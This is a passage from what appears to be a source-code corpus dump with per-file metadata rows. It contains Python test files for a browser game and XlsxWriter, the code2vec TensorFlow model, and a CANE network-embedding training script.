                                  ( 'headers', 'allow_headers' ),
                                  ( 'exposed_headers', 'expose_headers' ) ]:
            value = self.pop(from_key, None)

            # falsy values (None, '', [], 0) are deliberately dropped
            if value:
                self[to_key] = self._cors_normalize(value)

        self.enabled = True
        return True

    @staticmethod
    def _cors_normalize(value: Any) -> Any:
        """
        List values get turned into a comma-separated string. Other values
        are returned unaltered.
        """
        if isinstance(value, list):
            return ", ".join([ str(x) for x in value ])
        else:
            return value
| 31.80597 | 96 | 0.507274 |
192f4ffbf4fc334d86f6d3d7461c053bdf1212ca | 4,951 | py | Python | src/the_tale/the_tale/game/bills/tests/test_place_modifier.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 1 | 2020-04-02T11:51:20.000Z | 2020-04-02T11:51:20.000Z | src/the_tale/the_tale/game/bills/tests/test_place_modifier.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | null | null | null | src/the_tale/the_tale/game/bills/tests/test_place_modifier.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | null | null | null |
import smart_imports
smart_imports.all()
class PlaceModifierTests(helpers.BaseTestPrototypes):
    """Create, vote on, and apply a bill that changes a place's modifier."""

    def setUp(self):
        super(PlaceModifierTests, self).setUp()

        self.place = self.place1
        self.place_2 = self.place2

        self.bill_data = bills.place_change_modifier.PlaceModifier(
            place_id=self.place.id,
            modifier_id=places_modifiers.CITY_MODIFIERS.TRADE_CENTER,
            modifier_name=places_modifiers.CITY_MODIFIERS.TRADE_CENTER.text,
            old_modifier_name=None)
        self.bill = prototypes.BillPrototype.create(
            self.account1, 'bill-1-caption', self.bill_data,
            chronicle_on_accepted='chronicle-on-accepted')

    def _cast_votes(self):
        # one vote against, one for — enough with the mocked MIN_VOTES_PERCENT
        prototypes.VotePrototype.create(self.account2, self.bill, relations.VOTE_TYPE.AGAINST)
        prototypes.VotePrototype.create(self.account3, self.bill, relations.VOTE_TYPE.FOR)

    def _approve_bill(self):
        # moderator marks the bill as approved
        data = self.bill.user_form_initials
        data['approved'] = True
        form = self.bill.data.get_moderator_form_update(data)
        self.assertTrue(form.is_valid())
        self.bill.update_by_moderator(form)

    def test_create(self):
        self.assertEqual(self.bill.data.place_id, self.place.id)
        self.assertTrue(self.bill.data.modifier_id.is_TRADE_CENTER)
        self.assertEqual(self.bill.data.modifier_name,
                         places_modifiers.CITY_MODIFIERS.TRADE_CENTER.text)
        self.assertEqual(self.bill.data.old_modifier_name, None)

    def test_actors(self):
        self.assertEqual([id(actor) for actor in self.bill_data.actors], [id(self.place)])

    def test_update(self):
        self.place_2.attrs.modifier_craft_center = 100

        form = self.bill.data.get_user_form_update(
            post={'caption': 'new-caption',
                  'place': self.place_2.id,
                  'chronicle_on_accepted': 'chronicle-on-accepted',
                  'new_modifier': places_modifiers.CITY_MODIFIERS.CRAFT_CENTER})
        self.assertTrue(form.is_valid())

        self.bill.update(form)
        self.bill = prototypes.BillPrototype.get_by_id(self.bill.id)

        self.assertEqual(self.bill.data.place_id, self.place_2.id)
        self.assertTrue(self.bill.data.modifier_id.is_CRAFT_CENTER)
        self.assertEqual(self.bill.data.modifier_name,
                         places_modifiers.CITY_MODIFIERS.CRAFT_CENTER.text)
        self.assertEqual(self.bill.data.old_modifier_name, None)

    def test_success_form_validation(self):
        self.place_2.attrs.modifier_craft_center = 100

        form = self.bill.data.get_user_form_update(
            post={'caption': 'new-caption',
                  'chronicle_on_accepted': 'chronicle-on-accepted-2',
                  'place': self.place_2.id,
                  'new_modifier': places_modifiers.CITY_MODIFIERS.CRAFT_CENTER})
        self.assertTrue(form.is_valid())

    def test_not_allowed_modifier(self):
        # a place without the craft-center attribute may not take the modifier
        self.place_2.attrs.modifier_craft_center = 0

        form = self.bill.data.get_user_form_update(
            post={'caption': 'new-caption',
                  'chronicle_on_accepted': 'chronicle-on-accepted-2',
                  'place': self.place_2.id,
                  'new_modifier': places_modifiers.CITY_MODIFIERS.CRAFT_CENTER})
        self.assertFalse(form.is_valid())

    @mock.patch('the_tale.game.bills.conf.settings.MIN_VOTES_PERCENT', 0.6)
    @mock.patch('the_tale.game.bills.prototypes.BillPrototype.time_before_voting_end',
                datetime.timedelta(seconds=0))
    def test_apply(self):
        self._cast_votes()
        self._approve_bill()

        self.assertTrue(self.bill.apply())

        accepted_bill = prototypes.BillPrototype.get_by_id(self.bill.id)
        self.assertTrue(accepted_bill.state.is_ACCEPTED)
        self.assertTrue(self.place._modifier.is_TRADE_CENTER)

    @mock.patch('the_tale.game.bills.conf.settings.MIN_VOTES_PERCENT', 0.6)
    @mock.patch('the_tale.game.bills.prototypes.BillPrototype.time_before_voting_end',
                datetime.timedelta(seconds=0))
    def test_has_meaning__duplicate_modifier(self):
        self._cast_votes()
        self._approve_bill()

        # the place already carries the modifier, so the bill is a no-op
        self.bill.data.place.set_modifier(self.bill.data.modifier_id)
        places_logic.save_place(self.bill.data.place)

        self.assertFalse(self.bill.has_meaning())
| 48.539216 | 147 | 0.631994 |
07b7b942cb57cd366254180d58e0d1a7c2818c9c | 799 | py | Python | xlsxwriter/test/comparison/test_textbox09.py | adgear/XlsxWriter | 79bcaad28d57ac29038b1c74bccc6d611b7a385e | [
"BSD-2-Clause-FreeBSD"
] | 2 | 2019-07-25T06:08:09.000Z | 2019-11-01T02:33:56.000Z | xlsxwriter/test/comparison/test_textbox09.py | adgear/XlsxWriter | 79bcaad28d57ac29038b1c74bccc6d611b7a385e | [
"BSD-2-Clause-FreeBSD"
] | 13 | 2019-07-14T00:29:05.000Z | 2019-11-26T06:16:46.000Z | xlsxwriter/test/comparison/test_textbox09.py | adgear/XlsxWriter | 79bcaad28d57ac29038b1c74bccc6d611b7a385e | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Test file created by XlsxWriter against a file created by Excel.
    """

    def setUp(self):
        # Name of the pre-made reference workbook the generated file is compared to.
        self.set_filename('textbox09.xlsx')

    def test_create_file(self):
        """Test the creation of a simple XlsxWriter file with textbox(s)."""
        workbook = Workbook(self.got_filename)
        worksheet = workbook.add_worksheet()
        # Multi-line text (including a blank line) exercises newline handling
        # inside a textbox.
        worksheet.insert_textbox('E9', 'This\nis\n\nsome long text')
        workbook.close()
        self.assertExcelEqual()
d2e7fec343905e8befe630b479dab9f8b21a31f8 | 27,695 | py | Python | model.py | ZhaoYi1031/code2vec | 40553fcc14d3bd93995c73aefdbdefa2e0e66b98 | [
"MIT"
] | null | null | null | model.py | ZhaoYi1031/code2vec | 40553fcc14d3bd93995c73aefdbdefa2e0e66b98 | [
"MIT"
] | null | null | null | model.py | ZhaoYi1031/code2vec | 40553fcc14d3bd93995c73aefdbdefa2e0e66b98 | [
"MIT"
] | null | null | null | import tensorflow as tf
import PathContextReader
import numpy as np
import time
import pickle
from common import common, VocabType
class Model:
topk = 10
num_batches_to_log = 100
def __init__(self, config):
# 模型的主要参数都写在这里
self.config = config
self.sess = tf.Session()
self.eval_data_lines = None
self.eval_queue = None
self.predict_queue = None
self.eval_placeholder = None
self.predict_placeholder = None
self.eval_top_words_op, self.eval_top_values_op, self.eval_original_names_op, self.eval_code_vectors = None, None, None, None
self.predict_top_words_op, self.predict_top_values_op, self.predict_original_names_op = None, None, None
if config.TRAIN_PATH:
with open('{}.dict.c2v'.format(config.TRAIN_PATH), 'rb') as file:
word_to_count = pickle.load(file)
path_to_count = pickle.load(file)
target_to_count = pickle.load(file)
num_training_examples = pickle.load(file)
self.config.NUM_EXAMPLES = num_training_examples
print('Dictionaries loaded.')
if config.LOAD_PATH:
self.load_model(sess=None)
else:
self.word_to_index, self.index_to_word, self.word_vocab_size = \
common.load_vocab_from_dict(word_to_count, config.WORDS_VOCAB_SIZE, start_from=1)
print('Loaded word vocab. size: %d' % self.word_vocab_size)
# 啊,这个此表是预先定义好的
# 这个是source的词表
self.target_word_to_index, self.index_to_target_word, self.target_word_vocab_size = \
common.load_vocab_from_dict(target_to_count, config.TARGET_VOCAB_SIZE,
start_from=1)
print('Loaded target word vocab. size: %d' % self.target_word_vocab_size)
self.path_to_index, self.index_to_path, self.path_vocab_size = \
common.load_vocab_from_dict(path_to_count, config.PATHS_VOCAB_SIZE,
start_from=1)
print('Loaded paths vocab. size: %d' % self.path_vocab_size)
self.create_index_to_target_word_map()
def create_index_to_target_word_map(self):
self.index_to_target_word_table = tf.contrib.lookup.HashTable(
tf.contrib.lookup.KeyValueTensorInitializer(list(self.index_to_target_word.keys()),
list(self.index_to_target_word.values()),
key_dtype=tf.int64, value_dtype=tf.string),
default_value=tf.constant(common.noSuchWord, dtype=tf.string))
    def close_session(self):
        """Release the TensorFlow session owned by this model."""
        self.sess.close()
def train(self):
print('Starting training')
start_time = time.time()
batch_num = 0
sum_loss = 0
multi_batch_start_time = time.time()
num_batches_to_evaluate = max(int(
self.config.NUM_EXAMPLES / self.config.BATCH_SIZE * self.config.SAVE_EVERY_EPOCHS), 1)
self.queue_thread = PathContextReader.PathContextReader(word_to_index=self.word_to_index,
path_to_index=self.path_to_index,
target_word_to_index=self.target_word_to_index,
config=self.config)
optimizer, train_loss = self.build_training_graph(self.queue_thread.input_tensors())
# !
self.saver = tf.train.Saver(max_to_keep=self.config.MAX_TO_KEEP)
self.initialize_session_variables(self.sess)
print('Initalized variables')
if self.config.LOAD_PATH:
self.load_model(self.sess)
with self.queue_thread.start(self.sess):
time.sleep(1)
print('Started reader...')
try:
while True:
batch_num += 1
_, batch_loss = self.sess.run([optimizer, train_loss])
#在这个里面去run了,
sum_loss += batch_loss
# loss是所有batch的loss的和
if batch_num % self.num_batches_to_log == 0:
self.trace(sum_loss, batch_num, multi_batch_start_time)
print('Number of waiting examples in queue: %d' % self.sess.run(
"shuffle_batch/random_shuffle_queue_Size:0"))
sum_loss = 0
multi_batch_start_time = time.time()
if batch_num % num_batches_to_evaluate == 0:
epoch_num = int((batch_num / num_batches_to_evaluate) * self.config.SAVE_EVERY_EPOCHS)
save_target = self.config.SAVE_PATH + '_iter' + str(epoch_num)
self.save_model(self.sess, save_target)
print('Saved after %d epochs in: %s' % (epoch_num, save_target))
results, precision, recall, f1 = self.evaluate()
print('Accuracy after %d epochs: %s' % (epoch_num, results[:5]))
print('After ' + str(epoch_num) + ' epochs: Precision: ' + str(precision) + ', recall: ' + str(
recall) + ', F1: ' + str(f1))
except tf.errors.OutOfRangeError:
print('Done training')
if self.config.SAVE_PATH:
self.save_model(self.sess, self.config.SAVE_PATH)
print('Model saved in file: %s' % self.config.SAVE_PATH)
elapsed = int(time.time() - start_time)
print("Training time: %sH:%sM:%sS\n" % ((elapsed // 60 // 60), (elapsed // 60) % 60, elapsed % 60))
def trace(self, sum_loss, batch_num, multi_batch_start_time):
multi_batch_elapsed = time.time() - multi_batch_start_time
avg_loss = sum_loss / (self.num_batches_to_log * self.config.BATCH_SIZE)
print('Average loss at batch %d: %f, \tthroughput: %d samples/sec' % (batch_num, avg_loss,
self.config.BATCH_SIZE * self.num_batches_to_log / (
multi_batch_elapsed if multi_batch_elapsed > 0 else 1)))
def evaluate(self):
eval_start_time = time.time()
if self.eval_queue is None:
self.eval_queue = PathContextReader.PathContextReader(word_to_index=self.word_to_index,
path_to_index=self.path_to_index,
target_word_to_index=self.target_word_to_index,
config=self.config, is_evaluating=True)
# 读路径上下文
self.eval_placeholder = self.eval_queue.get_input_placeholder()
self.eval_top_words_op, self.eval_top_values_op, self.eval_original_names_op, _, _, _, _, self.eval_code_vectors = \
self.build_test_graph(self.eval_queue.get_filtered_batches())
self.saver = tf.train.Saver()
if self.config.LOAD_PATH and not self.config.TRAIN_PATH:
self.initialize_session_variables(self.sess)
self.load_model(self.sess)
if self.config.RELEASE:
release_name = self.config.LOAD_PATH + '.release'
print('Releasing model, output model: %s' % release_name )
self.saver.save(self.sess, release_name )
return None
if self.eval_data_lines is None:
print('Loading test data from: ' + self.config.TEST_PATH)
self.eval_data_lines = common.load_file_lines(self.config.TEST_PATH)
print('Done loading test data')
with open('log.txt', 'w') as output_file:
#print("output_file(ohazyi)=", output_file)
if self.config.EXPORT_CODE_VECTORS:
code_vectors_file = open(self.config.TEST_PATH + '.vectors', 'w')
#print("code_vector_file(ohazyi) = ", code_vectors_file)
num_correct_predictions = np.zeros(self.topk)
total_predictions = 0
total_prediction_batches = 0
true_positive, false_positive, false_negative = 0, 0, 0
start_time = time.time()
for batch in common.split_to_batches(self.eval_data_lines, self.config.TEST_BATCH_SIZE):
top_words, top_scores, original_names, code_vectors = self.sess.run(
[self.eval_top_words_op, self.eval_top_values_op, self.eval_original_names_op, self.eval_code_vectors],
feed_dict={self.eval_placeholder: batch})
top_words, original_names = common.binary_to_string_matrix(top_words), common.binary_to_string_matrix(
original_names)
# Flatten original names from [[]] to []
original_names = [w for l in original_names for w in l]
num_correct_predictions = self.update_correct_predictions(num_correct_predictions, output_file,
zip(original_names, top_words))
true_positive, false_positive, false_negative = self.update_per_subtoken_statistics(
zip(original_names, top_words),
true_positive, false_positive, false_negative)
total_predictions += len(original_names)
total_prediction_batches += 1
if self.config.EXPORT_CODE_VECTORS:
self.write_code_vectors(code_vectors_file, code_vectors)
if total_prediction_batches % self.num_batches_to_log == 0:
elapsed = time.time() - start_time
# start_time = time.time()
self.trace_evaluation(output_file, num_correct_predictions, total_predictions, elapsed, len(self.eval_data_lines))
print('Done testing, epoch reached')
output_file.write(str(num_correct_predictions / total_predictions) + '\n')
if self.config.EXPORT_CODE_VECTORS:
code_vectors_file.close()
elapsed = int(time.time() - eval_start_time)
precision, recall, f1 = self.calculate_results(true_positive, false_positive, false_negative)
print("Evaluation time: %sH:%sM:%sS" % ((elapsed // 60 // 60), (elapsed // 60) % 60, elapsed % 60))
del self.eval_data_lines
self.eval_data_lines = None
return num_correct_predictions / total_predictions, precision, recall, f1
def write_code_vectors(self, file, code_vectors):
for vec in code_vectors:
file.write(' '.join(map(str, vec)) + '\n')
    def update_per_subtoken_statistics(self, results, true_positive, false_positive, false_negative):
        """Accumulate subtoken-level TP/FP/FN counts and return the updated triple.

        results: iterable of (original_name, top_words) pairs; only the first
        surviving prediction per example is scored.
        """
        for original_name, top_words in results:
            # Take the best candidate left after filtering
            # (common.filter_impossible_names presumably drops OOV/placeholder
            # tokens — TODO confirm against common module).
            prediction = common.filter_impossible_names(top_words)[0]
            original_subtokens = common.get_subtokens(original_name)
            predicted_subtokens = common.get_subtokens(prediction)
            # Predicted subtoken present in the truth -> TP, otherwise FP.
            for subtok in predicted_subtokens:
                if subtok in original_subtokens:
                    true_positive += 1
                else:
                    false_positive += 1
            # Truth subtoken never predicted -> FN.
            for subtok in original_subtokens:
                if not subtok in predicted_subtokens:
                    false_negative += 1
        return true_positive, false_positive, false_negative
@staticmethod
def calculate_results(true_positive, false_positive, false_negative):
precision = true_positive / (true_positive + false_positive)
recall = true_positive / (true_positive + false_negative)
f1 = 2 * precision * recall / (precision + recall)
return precision, recall, f1
    @staticmethod
    def trace_evaluation(output_file, correct_predictions, total_predictions, elapsed, total_examples):
        """Print evaluation progress and throughput to stdout.

        NOTE(review): `output_file` and `correct_predictions` are accepted but
        never used here — verify whether they were meant to be written/logged.
        """
        state_message = 'Evaluated %d/%d examples...' % (total_predictions, total_examples)
        # Guard against elapsed == 0 on very fast batches.
        throughput_message = "Prediction throughput: %d samples/sec" % int(total_predictions / (elapsed if elapsed > 0 else 1))
        print(state_message)
        print(throughput_message)
    def update_correct_predictions(self, num_correct_predictions, output_file, results):
        """Update the per-rank correct-prediction histogram and log each example.

        num_correct_predictions: array of length self.topk; slot j counts
        examples predicted correctly at rank <= j+1 (a hit at rank i increments
        every slot from i upward).
        """
        for original_name, top_words in results:
            normalized_original_name = common.normalize_word(original_name)
            predicted_something = False
            for i, predicted_word in enumerate(common.filter_impossible_names(top_words)):
                if i == 0:
                    # Log only the top-1 suggestion for readability.
                    output_file.write('Original: ' + original_name + ', predicted 1st: ' + predicted_word + '\n')
                predicted_something = True
                normalized_suggestion = common.normalize_word(predicted_word)
                if normalized_original_name == normalized_suggestion:
                    output_file.write('\t\t predicted correctly at rank: ' + str(i + 1) + '\n')
                    # A hit at rank i counts as a hit for every k >= i.
                    for j in range(i, self.topk):
                        num_correct_predictions[j] += 1
                    break
            if not predicted_something:
                output_file.write('No results for predicting: ' + original_name)
        return num_correct_predictions
def build_training_graph(self, input_tensors):
words_input, source_input, path_input, target_input, valid_mask = input_tensors # (batch, 1), (batch, max_contexts)
with tf.variable_scope('model'):
words_vocab = tf.get_variable('WORDS_VOCAB', shape=(self.word_vocab_size + 1, self.config.EMBEDDINGS_SIZE),
dtype=tf.float32,
initializer=tf.contrib.layers.variance_scaling_initializer(factor=1.0,
mode='FAN_OUT',
uniform=True))
target_words_vocab = tf.get_variable('TARGET_WORDS_VOCAB',
shape=(
self.target_word_vocab_size + 1, self.config.EMBEDDINGS_SIZE * 3),
dtype=tf.float32,
initializer=tf.contrib.layers.variance_scaling_initializer(factor=1.0,
mode='FAN_OUT',
uniform=True))
# 目标单词
attention_param = tf.get_variable('ATTENTION',
shape=(self.config.EMBEDDINGS_SIZE * 3, 1), dtype=tf.float32)
# 权重的参数
paths_vocab = tf.get_variable('PATHS_VOCAB', shape=(self.path_vocab_size + 1, self.config.EMBEDDINGS_SIZE),
dtype=tf.float32,
initializer=tf.contrib.layers.variance_scaling_initializer(factor=1.0,
mode='FAN_OUT',
uniform=True))
# path的vocab是什么回事
# 这个是什么路径呀?
code_vectors, _ = self.calculate_weighted_contexts(words_vocab, paths_vocab, attention_param,
source_input, path_input, target_input,
valid_mask)
# 计算加权的向量
logits = tf.matmul(code_vectors, target_words_vocab, transpose_b=True)
batch_size = tf.to_float(tf.shape(words_input)[0])
loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=tf.reshape(words_input, [-1]),
logits=logits)) / batch_size
optimizer = tf.train.AdamOptimizer().minimize(loss)
return optimizer, loss
def calculate_weighted_contexts(self, words_vocab, paths_vocab, attention_param, source_input, path_input,
target_input, valid_mask, is_evaluating=False):
# 计算加权上下文
keep_prob1 = 0.75
max_contexts = self.config.MAX_CONTEXTS
source_word_embed = tf.nn.embedding_lookup(params=words_vocab, ids=source_input) # (batch, max_contexts, dim)
path_embed = tf.nn.embedding_lookup(params=paths_vocab, ids=path_input) # (batch, max_contexts, dim)
target_word_embed = tf.nn.embedding_lookup(params=words_vocab, ids=target_input) # (batch, max_contexts, dim)
# 3个128的向量分别去embedding一下
context_embed = tf.concat([source_word_embed, path_embed, target_word_embed],
axis=-1) # (batch, max_contexts, dim * 3)
if not is_evaluating:
context_embed = tf.nn.dropout(context_embed, keep_prob1)
flat_embed = tf.reshape(context_embed, [-1, self.config.EMBEDDINGS_SIZE * 3]) # (batch * max_contexts, dim * 3)
transform_param = tf.get_variable('TRANSFORM',
shape=(self.config.EMBEDDINGS_SIZE * 3, self.config.EMBEDDINGS_SIZE * 3),
dtype=tf.float32)
flat_embed = tf.tanh(tf.matmul(flat_embed, transform_param)) # (batch * max_contexts, dim * 3)
contexts_weights = tf.matmul(flat_embed, attention_param) # (batch * max_contexts, 1)
batched_contexts_weights = tf.reshape(contexts_weights,
[-1, max_contexts, 1]) # (batch, max_contexts, 1)
mask = tf.log(valid_mask) # (batch, max_contexts)
mask = tf.expand_dims(mask, axis=2) # (batch, max_contexts, 1)
batched_contexts_weights += mask # (batch, max_contexts, 1)
attention_weights = tf.nn.softmax(batched_contexts_weights, axis=1) # (batch, max_contexts, 1)
batched_embed = tf.reshape(flat_embed, shape=[-1, max_contexts, self.config.EMBEDDINGS_SIZE * 3])
code_vectors = tf.reduce_sum(tf.multiply(batched_embed, attention_weights),
axis=1) # (batch, dim * 3)
return code_vectors, attention_weights
def build_test_graph(self, input_tensors, normalize_scores=False):
# !
with tf.variable_scope('model', reuse=self.get_should_reuse_variables()):
words_vocab = tf.get_variable('WORDS_VOCAB', shape=(self.word_vocab_size + 1, self.config.EMBEDDINGS_SIZE),
dtype=tf.float32, trainable=False)
target_words_vocab = tf.get_variable('TARGET_WORDS_VOCAB',
shape=(
self.target_word_vocab_size + 1, self.config.EMBEDDINGS_SIZE * 3),
dtype=tf.float32, trainable=False)
attention_param = tf.get_variable('ATTENTION',
shape=(self.config.EMBEDDINGS_SIZE * 3, 1),
dtype=tf.float32, trainable=False)
paths_vocab = tf.get_variable('PATHS_VOCAB',
shape=(self.path_vocab_size + 1, self.config.EMBEDDINGS_SIZE),
dtype=tf.float32, trainable=False)
target_words_vocab = tf.transpose(target_words_vocab) # (dim * 3, target_word_vocab+1)
words_input, source_input, path_input, target_input, valid_mask, source_string, path_string, path_target_string = input_tensors # (batch, 1), (batch, max_contexts)
code_vectors, attention_weights = self.calculate_weighted_contexts(words_vocab, paths_vocab,
attention_param,
source_input, path_input,
target_input,
valid_mask, True)
scores = tf.matmul(code_vectors, target_words_vocab) # (batch, target_word_vocab+1)
topk_candidates = tf.nn.top_k(scores, k=tf.minimum(self.topk, self.target_word_vocab_size))
top_indices = tf.to_int64(topk_candidates.indices)
top_words = self.index_to_target_word_table.lookup(top_indices)
original_words = words_input
top_scores = topk_candidates.values
if normalize_scores:
top_scores = tf.nn.softmax(top_scores)
return top_words, top_scores, original_words, attention_weights, source_string, path_string, path_target_string, code_vectors
def predict(self, predict_data_lines):
if self.predict_queue is None:
self.predict_queue = PathContextReader.PathContextReader(word_to_index=self.word_to_index,
path_to_index=self.path_to_index,
target_word_to_index=self.target_word_to_index,
config=self.config, is_evaluating=True)
self.predict_placeholder = self.predict_queue.get_input_placeholder()
self.predict_top_words_op, self.predict_top_values_op, self.predict_original_names_op, \
self.attention_weights_op, self.predict_source_string, self.predict_path_string, self.predict_path_target_string, self.predict_code_vectors = \
self.build_test_graph(self.predict_queue.get_filtered_batches(), normalize_scores=True)
self.initialize_session_variables(self.sess)
self.saver = tf.train.Saver()
self.load_model(self.sess)
code_vectors = []
results = []
for batch in common.split_to_batches(predict_data_lines, 1):
top_words, top_scores, original_names, attention_weights, source_strings, path_strings, target_strings, batch_code_vectors = self.sess.run(
[self.predict_top_words_op, self.predict_top_values_op, self.predict_original_names_op,
self.attention_weights_op, self.predict_source_string, self.predict_path_string,
self.predict_path_target_string, self.predict_code_vectors],
feed_dict={self.predict_placeholder: batch})
top_words, original_names = common.binary_to_string_matrix(top_words), common.binary_to_string_matrix(
original_names)
# Flatten original names from [[]] to []
attention_per_path = self.get_attention_per_path(source_strings, path_strings, target_strings,
attention_weights)
original_names = [w for l in original_names for w in l]
results.append((original_names[0], top_words[0], top_scores[0], attention_per_path))
if self.config.EXPORT_CODE_VECTORS:
print("batch_code_vectors(ohazyi)=", batch_code_vectors)
code_vectors.append(batch_code_vectors)
if len(code_vectors) > 0:
code_vectors = np.vstack(code_vectors)
return results, code_vectors
    def get_attention_per_path(self, source_strings, path_strings, target_strings, attention_weights):
        """Map each (source, path, target) context triplet to its attention weight.

        Assumes the four arguments are aligned element-wise for a single
        example's contexts — TODO confirm with the caller in predict().
        """
        attention_weights = np.squeeze(attention_weights)  # (max_contexts, )
        attention_per_context = {}
        for source, path, target, weight in zip(source_strings, path_strings, target_strings, attention_weights):
            # Decode the byte strings coming out of the TF graph.
            string_triplet = (
                common.binary_to_string(source), common.binary_to_string(path), common.binary_to_string(target))
            attention_per_context[string_triplet] = weight
        return attention_per_context
@staticmethod
def get_dictionaries_path(model_file_path):
dictionaries_save_file_name = "dictionaries.bin"
return '/'.join(model_file_path.split('/')[:-1] + [dictionaries_save_file_name])
    def save_model(self, sess, path):
        """Save TF weights to *path* and pickle the vocabularies next to them.

        The pickle dump order below is a contract: load_model must read the
        objects back in exactly the same order.
        """
        self.saver.save(sess, path)
        with open(self.get_dictionaries_path(path), 'wb') as file:
            pickle.dump(self.word_to_index, file)
            pickle.dump(self.index_to_word, file)
            pickle.dump(self.word_vocab_size, file)
            pickle.dump(self.target_word_to_index, file)
            pickle.dump(self.index_to_target_word, file)
            pickle.dump(self.target_word_vocab_size, file)
            pickle.dump(self.path_to_index, file)
            pickle.dump(self.index_to_path, file)
            pickle.dump(self.path_vocab_size, file)
def load_model(self, sess):
if not sess is None:
print('Loading model weights from: ' + self.config.LOAD_PATH)
self.saver.restore(sess, self.config.LOAD_PATH)
print('Done')
dictionaries_path = self.get_dictionaries_path(self.config.LOAD_PATH)
with open(dictionaries_path , 'rb') as file:
print('Loading model dictionaries from: %s' % dictionaries_path)
self.word_to_index = pickle.load(file)
self.index_to_word = pickle.load(file)
self.word_vocab_size = pickle.load(file)
self.target_word_to_index = pickle.load(file)
self.index_to_target_word = pickle.load(file)
self.target_word_vocab_size = pickle.load(file)
self.path_to_index = pickle.load(file)
self.index_to_path = pickle.load(file)
self.path_vocab_size = pickle.load(file)
print('Done')
def save_word2vec_format(self, dest, source):
with tf.variable_scope('model', reuse=None):
if source is VocabType.Token:
vocab_size = self.word_vocab_size
embedding_size = self.config.EMBEDDINGS_SIZE
index = self.index_to_word
var_name = 'WORDS_VOCAB'
elif source is VocabType.Target:
vocab_size = self.target_word_vocab_size
embedding_size = self.config.EMBEDDINGS_SIZE * 3
index = self.index_to_target_word
var_name = 'TARGET_WORDS_VOCAB'
else:
raise ValueError('vocab type should be VocabType.Token or VocabType.Target.')
embeddings = tf.get_variable(var_name, shape=(vocab_size + 1, embedding_size), dtype=tf.float32,
trainable=False)
self.saver = tf.train.Saver()
self.load_model(self.sess)
np_embeddings = self.sess.run(embeddings)
with open(dest, 'w') as words_file:
common.save_word2vec_file(words_file, vocab_size, embedding_size, index, np_embeddings)
    @staticmethod
    def initialize_session_variables(sess):
        """Run global/local variable and lookup-table initializers in one call."""
        sess.run(tf.group(tf.global_variables_initializer(), tf.local_variables_initializer(), tf.tables_initializer()))
def get_should_reuse_variables(self):
if self.config.TRAIN_PATH:
return True
else:
return None
| 55.61245 | 176 | 0.583246 |
01a18ad5b2281c4cb8bd4766efa7da3aa9c46055 | 4,310 | py | Python | code/train.py | fengduqianhe/CANE-master | 4d94bbd0669ccb103292e1e1f2c51e7c7a961e54 | [
"MIT"
] | null | null | null | code/train.py | fengduqianhe/CANE-master | 4d94bbd0669ccb103292e1e1f2c51e7c7a961e54 | [
"MIT"
] | null | null | null | code/train.py | fengduqianhe/CANE-master | 4d94bbd0669ccb103292e1e1f2c51e7c7a961e54 | [
"MIT"
] | null | null | null | import numpy as np
import tensorflow as tf
from .DataSet import dataSet
from .import config
from .import cane
import random
import os
import argparse
# parser = argparse.ArgumentParser()
# parser.add_argument('--dataset', '-d')
# parser.add_argument('--rho', '-r')
# args = parser.parse_args()
def start_train(dataset):
# load data
dataset_name = dataset
graph_path = os.path.join('temp/graph.txt')
text_path = os.path.join("..", "datasets", dataset_name, 'data.txt')
data = dataSet(text_path, graph_path)
# start session
with tf.Graph().as_default():
sess = tf.Session()
with sess.as_default():
model = cane.Model(data.num_vocab, data.num_nodes, 0)
opt = tf.train.AdamOptimizer(config.lr)
train_op = opt.minimize(model.loss)
sess.run(tf.global_variables_initializer())
# training
print('start training.......')
for epoch in range(config.num_epoch):
loss_epoch = 0
batches = data.generate_batches()
h1 = 0
num_batch = len(batches)
for i in range(num_batch):
batch = batches[i]
node1, node2, node3 = zip(*batch)
node1, node2, node3 = np.array(node1), np.array(node2), np.array(node3)
text1, text2, text3 = data.text[node1], data.text[node2], data.text[node3]
feed_dict = {
model.Text_a: text1,
model.Text_b: text2,
model.Text_neg: text3,
model.Node_a: node1,
model.Node_b: node2,
model.Node_neg: node3
}
# print("batch", batch)
# print("node", node1)
# print("text1", text1)
# print("text2", text2)
# print("text3", text3)
# print("Node_neg", node3)
# run the graph
_, loss_batch = sess.run([train_op, model.loss], feed_dict=feed_dict)
loss_epoch += loss_batch
#print('batch', batch, 'loss', loss_epoch)
ta = sess.run(model.TA, feed_dict=feed_dict)
t_a= sess.run(model.T_A, feed_dict=feed_dict)
te = sess.run(model.text_embed, feed_dict=feed_dict)
text_a = sess.run(model.Text_a, feed_dict=feed_dict)
# print("ta", ta.shape)
# print("t_a", t_a.shape)
# print("te", te.shape)
# print("text_a", text_a.shape)
print('epoch: ', epoch + 1, ' loss: ', loss_epoch)
file = open('temp/embed.txt', 'wb')
batches = data.generate_batches(mode='add')
num_batch = len(batches)
embed = [[] for _ in range(data.num_nodes)]
for i in range(num_batch):
batch = batches[i]
node1, node2, node3 = zip(*batch)
node1, node2, node3 = np.array(node1), np.array(node2), np.array(node3)
text1, text2, text3 = data.text[node1], data.text[node2], data.text[node3]
feed_dict = {
model.Text_a: text1,
model.Text_b: text2,
model.Text_neg: text3,
model.Node_a: node1,
model.Node_b: node2,
model.Node_neg: node3
}
# run the graph
convA, convB, TA, TB = sess.run([model.convA, model.convB, model.N_A, model.N_B], feed_dict=feed_dict)
for i in range(config.batch_size):
em = list(TA[i])
embed[node1[i]].append(em)
em = list(TB[i])
embed[node2[i]].append(em)
for i in range(data.num_nodes):
if embed[i]:
# print embed[i]
tmp = np.sum(embed[i], axis=0) / len(embed[i])
file.write((' '.join(map(str, tmp)) + '\n').encode())
else:
file.write('\n'.encode())
| 37.155172 | 118 | 0.482599 |
bb2a893d161ec341c6c656e6e8effe2ab7e07387 | 483 | py | Python | mainapp/migrations/0002_request_dateadded.py | reyasmohammed/rescuekerala | 68ee6cd4ea7b94e04fd32c4d488bcd7a8f2d371c | [
"MIT"
